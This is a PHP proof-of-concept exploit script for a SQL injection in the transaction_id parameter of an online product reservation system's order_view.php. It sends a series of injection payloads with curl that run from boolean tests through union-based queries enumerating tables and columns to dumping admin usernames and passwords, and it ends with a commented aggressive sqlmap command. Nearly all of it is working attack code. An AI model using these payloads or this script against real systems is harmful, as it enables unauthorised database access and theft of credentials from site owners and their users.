<?php
// CVE-2026-0585 SQL Injection PoC
// Target: code-projects Online Product Reservation System 1.0
// File: /order_view.php
// Parameter: transaction_id
// Basic authentication check
$user = 'admin';
$pass = 'password';
// Target URL
$target = 'http://target.com/order_view.php';
// Payloads for testing
$payloads = [
// Boolean-based blind SQL injection
"1' AND 1=1 -- -",
"1' AND 1=2 -- -",
// Union-based injection
"1' UNION SELECT 1,2,3,4,5,6,7,8 -- -",
// Database version extraction
"1' UNION SELECT NULL,version(),user(),database(),NULL,NULL,NULL,NULL -- -",
// Extract users table
"1' UNION SELECT NULL,table_name,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_schema=database() -- -",
// Extract columns from users table
"1' UNION SELECT NULL,column_name,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.columns WHERE table_name='users' -- -",
// Dump admin credentials
"1' UNION SELECT NULL,username,password,NULL,NULL,NULL,NULL,NULL FROM users WHERE role='admin' -- -"
];
foreach ($payloads as $payload) {
$url = $target . '?transaction_id=' . urlencode($payload);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "[*] Payload: $payload\n";
echo "[*] HTTP Code: $httpCode\n";
echo "[*] Response Length: " . strlen($response) . " bytes\n\n";
}
// SQLMap command for automated exploitation
// sqlmap -u "http://target.com/order_view.php?transaction_id=1" --batch --level=5 --risk=3
?>